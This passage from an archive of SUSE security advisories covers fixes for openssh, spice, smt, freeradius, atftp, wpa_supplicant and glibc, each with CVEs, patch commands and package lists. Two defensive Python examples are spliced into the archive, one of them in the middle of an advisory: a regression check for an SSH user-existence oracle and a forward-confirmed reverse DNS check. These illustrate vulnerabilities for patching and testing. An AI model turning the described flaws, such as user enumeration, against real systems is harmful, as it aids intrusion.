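    except MalformedPacket:
        return "disconnect"


def leaks_user_existence(handler: Callable[[bytes], str]) -> bool:
    """Regression check: a truncated request must be answered identically for a
    known and an unknown user; if not, the handler is a user-existence oracle."""
    known = observe(handler, build_request("alice", b"x")[:-1])
    unknown = observe(handler, build_request("mallory", b"x")[:-1])
    return known != unknown


if __name__ == "__main__":
    print("vulnerable leaks:", leaks_user_existence(vulnerable_handler))  # True
    print("hardened leaks:  ", leaks_user_existence(hardened_handler))    # False
```

The hardened variant is the shape of the upstream fix: every field of the packet is consumed and checked first, so a parse error produces the same disconnect whether or not the user exists, and only then does the user table enter the decision.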
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1081=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      openssh-6.6p1-54.18.1
      openssh-askpass-gnome-6.6p1-54.18.1
      openssh-askpass-gnome-debuginfo-6.6p1-54.18.1
      openssh-debuginfo-6.6p1-54.18.1
      openssh-debugsource-6.6p1-54.18.1
      openssh-fips-6.6p1-54.18.1
      openssh-helpers-6.6p1-54.18.1
      openssh-helpers-debuginfo-6.6p1-54.18.1

References:

   https://www.suse.com/security/cve/CVE-2018-15473.html
   https://www.suse.com/security/cve/CVE-2018-15919.html
   https://bugzilla.suse.com/1091396
   https://bugzilla.suse.com/1105010
   https://bugzilla.suse.com/1106163
   https://bugzilla.suse.com/964336
   https://bugzilla.suse.com/982273

From sle-security-updates at lists.suse.com Mon Apr 29 04:19:19 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 29 Apr 2019 12:19:19 +0200 (CEST)
Subject: SUSE-SU-2019:0125-2: important: Security update for openssh
Message-ID: <20190429101919.F10E0F3D3@maintenance.suse.de>

SUSE Security Update: Security update for openssh
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0125-2
Rating:             important
References:         #1121571 #1121816 #1121818 #1121821
Cross-References:   CVE-2018-20685 CVE-2019-6109 CVE-2019-6110 CVE-2019-6111
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes four vulnerabilities is now available.

Description:

This update for openssh fixes the following issues:

Security issues fixed:

- CVE-2018-20685: Fixed an issue where the scp client allowed remote SSH servers to bypass intended access restrictions (bsc#1121571)
- CVE-2019-6109: Fixed an issue where the scp client would allow malicious remote SSH servers to manipulate terminal output via the object name, e.g. by inserting ANSI escape sequences (bsc#1121816)
- CVE-2019-6110: Fixed an issue where the scp client would allow malicious remote SSH servers to manipulate stderr output, e.g. by inserting ANSI escape sequences (bsc#1121818)
- CVE-2019-6111: Fixed an issue where the scp client would allow malicious remote SSH servers to execute directory traversal attacks and overwrite files (bsc#1121821)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-125=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      openssh-6.6p1-54.26.1
      openssh-askpass-gnome-6.6p1-54.26.1
      openssh-askpass-gnome-debuginfo-6.6p1-54.26.1
      openssh-debuginfo-6.6p1-54.26.1
      openssh-debugsource-6.6p1-54.26.1
      openssh-fips-6.6p1-54.26.1
      openssh-helpers-6.6p1-54.26.1
      openssh-helpers-debuginfo-6.6p1-54.26.1

References:

   https://www.suse.com/security/cve/CVE-2018-20685.html
   https://www.suse.com/security/cve/CVE-2019-6109.html
   https://www.suse.com/security/cve/CVE-2019-6110.html
   https://www.suse.com/security/cve/CVE-2019-6111.html
   https://bugzilla.suse.com/1121571
   https://bugzilla.suse.com/1121816
   https://bugzilla.suse.com/1121818
   https://bugzilla.suse.com/1121821

From sle-security-updates at lists.suse.com Mon Apr 29 04:21:29 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 29 Apr 2019 12:21:29 +0200 (CEST)
Subject: SUSE-SU-2019:0231-2: important: Security update for spice
Message-ID: <20190429102129.2CCA2F3D3@maintenance.suse.de>

SUSE Security Update: Security update for spice
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0231-2
Rating:             important
References:         #1122706
Cross-References:   CVE-2019-3813
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that fixes one vulnerability is now available.

Description:

This update for spice fixes the following issues:

Security issue fixed:

- CVE-2019-3813: Fixed an out-of-bounds read in the memslot_get_virt function that could lead to denial of service or code execution (bsc#1122706).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-231=1

Package List:

   - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

      libspice-server1-0.12.5-10.2.3.1
      libspice-server1-debuginfo-0.12.5-10.2.3.1
      spice-debugsource-0.12.5-10.2.3.1

References:

   https://www.suse.com/security/cve/CVE-2019-3813.html
   https://bugzilla.suse.com/1122706

From sle-security-updates at lists.suse.com Mon Apr 29 04:22:13 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Mon, 29 Apr 2019 12:22:13 +0200 (CEST)
Subject: SUSE-SU-2018:3467-2: moderate: Security update for smt
Message-ID: <20190429102213.8B503F3D4@maintenance.suse.de>

SUSE Security Update: Security update for smt
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3467-2
Rating:             moderate
References:         #1104076 #1111056
Cross-References:   CVE-2018-12472
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

An update that solves one vulnerability and has one errata is now available.

Description:

SMT was updated to version 3.0.38.
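The CVE-2018-12472 entry in this advisory hardens the SMT sibling check by forcing a double reverse lookup. The following is an added illustration of what that check means in general, not SMT's own code: an address is trusted under a hostname only if the address reverse-resolves (PTR) to that name and the name forward-resolves (A/AAAA) back to the same address, so a peer controlling only its own PTR record cannot claim a name it does not own. The DNS records, the `fake_reverse`/`fake_forward` resolvers and the example addresses are constructed so the code runs offline; `system_reverse`/`system_forward` show how the real resolver would be plugged in.

```python
# Added example (not SMT code): a "double reverse lookup" (forward-confirmed
# reverse DNS) check of the kind CVE-2018-12472 introduced for the SMT sibling
# check. All DNS data below is constructed; a deployment would pass the
# system_* resolvers instead of the fake_* ones.
import socket
from typing import Callable, List, Optional

# Constructed DNS data (assumption). 192.0.2.20 claims the sibling's name via a
# PTR record, but the name's forward records do not confirm that address.
PTR_RECORDS = {
    "192.0.2.10": "smt-sibling.example.com.",
    "192.0.2.20": "smt-sibling.example.com.",
}
A_RECORDS = {
    "smt-sibling.example.com": ["192.0.2.10"],
}


def fake_reverse(ip: str) -> str:
    """Stand-in for a PTR lookup; raises like socket.gethostbyaddr on NXDOMAIN."""
    try:
        return PTR_RECORDS[ip]
    except KeyError:
        raise socket.herror(1, "Unknown host") from None


def fake_forward(name: str) -> List[str]:
    """Stand-in for an A/AAAA lookup; raises like socket.getaddrinfo on NXDOMAIN."""
    try:
        return A_RECORDS[name]
    except KeyError:
        raise socket.gaierror(-2, "Name or service not known") from None


def _canon(name: str) -> str:
    """Normalize a DNS name for comparison: lower-case, no trailing dot."""
    return name.lower().rstrip(".")


def double_reverse_lookup(ip: str,
                          reverse: Callable[[str], str],
                          forward: Callable[[str], List[str]]) -> Optional[str]:
    """Return the forward-confirmed hostname for ip, or None if the chain does not close."""
    try:
        name = _canon(reverse(ip))
    except OSError:            # socket.herror / socket.gaierror are OSError subclasses
        return None
    try:
        addrs = forward(name)
    except OSError:
        return None
    return name if ip in addrs else None


def is_trusted_sibling(ip: str, expected_host: str,
                       reverse: Optional[Callable[[str], str]] = None,
                       forward: Optional[Callable[[str], List[str]]] = None) -> bool:
    """Accept a sibling only if its address forward-confirms to the configured name."""
    reverse = reverse or system_reverse
    forward = forward or system_forward
    confirmed = double_reverse_lookup(ip, reverse, forward)
    return confirmed is not None and confirmed == _canon(expected_host)


def system_reverse(ip: str) -> str:
    """Real PTR lookup through the system resolver."""
    return socket.gethostbyaddr(ip)[0]


def system_forward(name: str) -> List[str]:
    """Real A/AAAA lookup through the system resolver, de-duplicated."""
    return sorted({info[4][0] for info in socket.getaddrinfo(name, None)})


if __name__ == "__main__":
    for peer in ("192.0.2.10", "192.0.2.20", "192.0.2.30"):
        ok = is_trusted_sibling(peer, "smt-sibling.example.com", fake_reverse, fake_forward)
        print(peer, "trusted" if ok else "rejected")
```

A single reverse lookup would accept 192.0.2.20, because whoever controls that address's reverse zone can put any name in the PTR record; the forward confirmation is what ties the name back to an address its owner actually publishes.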
Following security issue was fixed: - CVE-2018-12472: Harden hostname check during sibling check by forcing double reverse lookup (bsc#1104076) Following non security issues were fixed: - Add migration path check when registration sharing is enabled - Fix sibling sync errors (bsc#1111056): - Synchronize all registered products - Handle duplicate registrations when syncing - Force resync to the sibling instance in `upgrade` and `synchronize` API calls Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1084=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): res-signingkeys-3.0.38-52.26.1 smt-3.0.38-52.26.1 smt-debuginfo-3.0.38-52.26.1 smt-debugsource-3.0.38-52.26.1 smt-support-3.0.38-52.26.1 References: https://www.suse.com/security/cve/CVE-2018-12472.html https://bugzilla.suse.com/1104076 https://bugzilla.suse.com/1111056 From sle-security-updates at lists.suse.com Mon Apr 29 07:11:19 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 15:11:19 +0200 (CEST) Subject: SUSE-SU-2019:1086-1: important: Security update for freeradius-server Message-ID: <20190429131119.8120CF3D4@maintenance.suse.de> SUSE Security Update: Security update for freeradius-server ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1086-1 Rating: important References: #1132549 #1132664 Cross-References: CVE-2019-11234 CVE-2019-11235 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. 
Description: This update for freeradius-server fixes the following issues: Security issues fixed: - CVE-2019-11235: Fixed an authentication bypass related to the EAP-PWD Commit frame and insufficent validation of elliptic curve points (bsc#1132549). - CVE-2019-11234: Fixed an authentication bypass caused by reflecting privous values back to the server (bsc#1132664). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-1086=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1086=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): freeradius-server-3.0.16-3.3.1 freeradius-server-debuginfo-3.0.16-3.3.1 freeradius-server-debugsource-3.0.16-3.3.1 freeradius-server-devel-3.0.16-3.3.1 freeradius-server-krb5-3.0.16-3.3.1 freeradius-server-krb5-debuginfo-3.0.16-3.3.1 freeradius-server-ldap-3.0.16-3.3.1 freeradius-server-ldap-debuginfo-3.0.16-3.3.1 freeradius-server-libs-3.0.16-3.3.1 freeradius-server-libs-debuginfo-3.0.16-3.3.1 freeradius-server-mysql-3.0.16-3.3.1 freeradius-server-mysql-debuginfo-3.0.16-3.3.1 freeradius-server-perl-3.0.16-3.3.1 freeradius-server-perl-debuginfo-3.0.16-3.3.1 freeradius-server-postgresql-3.0.16-3.3.1 freeradius-server-postgresql-debuginfo-3.0.16-3.3.1 freeradius-server-python-3.0.16-3.3.1 freeradius-server-python-debuginfo-3.0.16-3.3.1 freeradius-server-sqlite-3.0.16-3.3.1 freeradius-server-sqlite-debuginfo-3.0.16-3.3.1 freeradius-server-utils-3.0.16-3.3.1 freeradius-server-utils-debuginfo-3.0.16-3.3.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): 
freeradius-server-debuginfo-3.0.16-3.3.1 freeradius-server-debugsource-3.0.16-3.3.1 freeradius-server-doc-3.0.16-3.3.1 References: https://www.suse.com/security/cve/CVE-2019-11234.html https://www.suse.com/security/cve/CVE-2019-11235.html https://bugzilla.suse.com/1132549 https://bugzilla.suse.com/1132664 From sle-security-updates at lists.suse.com Mon Apr 29 10:11:31 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 29 Apr 2019 18:11:31 +0200 (CEST) Subject: SUSE-SU-2019:1091-1: important: Security update for atftp Message-ID: <20190429161131.B2682F3D4@maintenance.suse.de> SUSE Security Update: Security update for atftp ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1091-1 Rating: important References: #1133114 #1133145 Cross-References: CVE-2019-11365 CVE-2019-11366 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for atftp fixes the following issues: Security issues fixed: - CVE-2019-11366: Fixed a denial of service caused by a NULL pointer dereference because thread_list_mutex was not locked (bsc#1133145). - CVE-2019-11365: Fixed a buffer overflow which could lead to remote code execution caused by an insecure use of strncpy() (bsc#1133114). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1091=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1091=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1091=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1091=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1091=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1091=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1091=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1091=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1091=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1091=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1091=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-1091=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): atftp-0.7.0-160.8.1 
atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 - SUSE Enterprise Storage 4 (x86_64): atftp-0.7.0-160.8.1 atftp-debuginfo-0.7.0-160.8.1 atftp-debugsource-0.7.0-160.8.1 References: https://www.suse.com/security/cve/CVE-2019-11365.html https://www.suse.com/security/cve/CVE-2019-11366.html https://bugzilla.suse.com/1133114 https://bugzilla.suse.com/1133145 From sle-security-updates at lists.suse.com Mon Apr 29 16:11:35 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 00:11:35 +0200 (CEST) Subject: SUSE-SU-2019:1088-1: moderate: Security update for wpa_supplicant Message-ID: <20190429221135.483B3F3D4@maintenance.suse.de> SUSE Security Update: Security update for wpa_supplicant ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1088-1 Rating: moderate References: #1104205 #1109209 Cross-References: CVE-2018-14526 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 
12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for wpa_supplicant fixes the following issues: This security issue was fixed: - CVE-2018-14526: Under certain conditions, the integrity of EAPOL-Key messages was not checked, leading to a decryption oracle. An attacker within range of the Access Point and client could have abused the vulnerability to recover sensitive information (bsc#1104205). This non-security issue was fixed: - Enabled PWD as EAP method. This allows for password-based authentication, which is easier to setup than most of the other methods, and is used by the Eduroam network (bsc#1109209). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1088=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1088=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1088=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1088=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1088=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1088=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1088=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1088=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1088=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1088=1 - SUSE Enterprise Storage 4: 
zypper in -t patch SUSE-Storage-4-2019-1088=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 - SUSE Enterprise Storage 4 (x86_64): wpa_supplicant-2.6-15.10.1 wpa_supplicant-debuginfo-2.6-15.10.1 wpa_supplicant-debugsource-2.6-15.10.1 References: https://www.suse.com/security/cve/CVE-2018-14526.html https://bugzilla.suse.com/1104205 https://bugzilla.suse.com/1109209 From sle-security-updates at 
lists.suse.com Mon Apr 29 16:12:33 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 00:12:33 +0200 (CEST) Subject: SUSE-SU-2019:14033-1: important: Security update for atftp Message-ID: <20190429221233.9CAD5F3D4@maintenance.suse.de> SUSE Security Update: Security update for atftp ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14033-1 Rating: important References: #1133114 #1133145 Cross-References: CVE-2019-11365 CVE-2019-11366 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for atftp fixes the following issues: Security issues fixed: - CVE-2019-11366: Fixed a denial of service caused by a NULL pointer dereference because thread_list_mutex was not locked (bsc#1133145). - CVE-2019-11365: Fixed a buffer overflow which could lead to remote code execution caused by an insecure use of strncpy() (bsc#1133114). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-atftp-14033=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-atftp-14033=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-atftp-14033=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-atftp-14033=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): atftp-0.7.0-135.23.3.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): atftp-0.7.0-135.23.3.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): atftp-debuginfo-0.7.0-135.23.3.1 atftp-debugsource-0.7.0-135.23.3.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): atftp-debuginfo-0.7.0-135.23.3.1 atftp-debugsource-0.7.0-135.23.3.1 References: https://www.suse.com/security/cve/CVE-2019-11365.html https://www.suse.com/security/cve/CVE-2019-11366.html https://bugzilla.suse.com/1133114 https://bugzilla.suse.com/1133145 From sle-security-updates at lists.suse.com Tue Apr 30 07:09:29 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 15:09:29 +0200 (CEST) Subject: SUSE-SU-2019:1102-1: moderate: Security update for glibc Message-ID: <20190430130929.128DCF3D3@maintenance.suse.de> SUSE Security Update: Security update for glibc ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1102-1 Rating: moderate References: #1100396 #1110661 #1122729 #1127223 #1127308 #1128574 #1131994 Cross-References: CVE-2009-5155 CVE-2016-10739 CVE-2019-9169 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Desktop 12-SP4 ______________________________________________________________________________ An update that solves three vulnerabilities and has four fixes is now available. 
Description: This update for glibc fixes the following issues: Security issues fixed: - CVE-2019-9169: regex: fix read overrun (bsc#1127308, BZ #24114) - CVE-2016-10739: Fully parse IPv4 address strings (bsc#1122729, BZ #20018) - CVE-2009-5155: ERE '0|()0|\1|0' causes regexec undefined behavior (bsc#1127223, BZ #18986) Non-security issues fixed: - Enable TLE only if GLIBC_ELISION_ENABLE=yes is defined (bsc#1131994, fate#322271) - Add more checks for valid ld.so.cache file (bsc#1110661, BZ #18093) - Added cfi information for start routines in order to stop unwinding (bsc#1128574) - ja_JP locale: Add entry for the new Japanese era (bsc#1100396, fate#325570, BZ #22964) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1102=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1102=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1102=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): glibc-debuginfo-2.22-100.8.1 glibc-debugsource-2.22-100.8.1 glibc-devel-static-2.22-100.8.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (noarch): glibc-info-2.22-100.8.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): glibc-2.22-100.8.1 glibc-debuginfo-2.22-100.8.1 glibc-debugsource-2.22-100.8.1 glibc-devel-2.22-100.8.1 glibc-devel-debuginfo-2.22-100.8.1 glibc-locale-2.22-100.8.1 glibc-locale-debuginfo-2.22-100.8.1 glibc-profile-2.22-100.8.1 nscd-2.22-100.8.1 nscd-debuginfo-2.22-100.8.1 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): glibc-32bit-2.22-100.8.1 glibc-debuginfo-32bit-2.22-100.8.1 glibc-devel-32bit-2.22-100.8.1 glibc-devel-debuginfo-32bit-2.22-100.8.1 
glibc-locale-32bit-2.22-100.8.1 glibc-locale-debuginfo-32bit-2.22-100.8.1 glibc-profile-32bit-2.22-100.8.1 - SUSE Linux Enterprise Server 12-SP4 (noarch): glibc-html-2.22-100.8.1 glibc-i18ndata-2.22-100.8.1 glibc-info-2.22-100.8.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): glibc-2.22-100.8.1 glibc-32bit-2.22-100.8.1 glibc-debuginfo-2.22-100.8.1 glibc-debuginfo-32bit-2.22-100.8.1 glibc-debugsource-2.22-100.8.1 glibc-devel-2.22-100.8.1 glibc-devel-32bit-2.22-100.8.1 glibc-devel-debuginfo-2.22-100.8.1 glibc-devel-debuginfo-32bit-2.22-100.8.1 glibc-locale-2.22-100.8.1 glibc-locale-32bit-2.22-100.8.1 glibc-locale-debuginfo-2.22-100.8.1 glibc-locale-debuginfo-32bit-2.22-100.8.1 nscd-2.22-100.8.1 nscd-debuginfo-2.22-100.8.1 - SUSE Linux Enterprise Desktop 12-SP4 (noarch): glibc-i18ndata-2.22-100.8.1 References: https://www.suse.com/security/cve/CVE-2009-5155.html https://www.suse.com/security/cve/CVE-2016-10739.html https://www.suse.com/security/cve/CVE-2019-9169.html https://bugzilla.suse.com/1100396 https://bugzilla.suse.com/1110661 https://bugzilla.suse.com/1122729 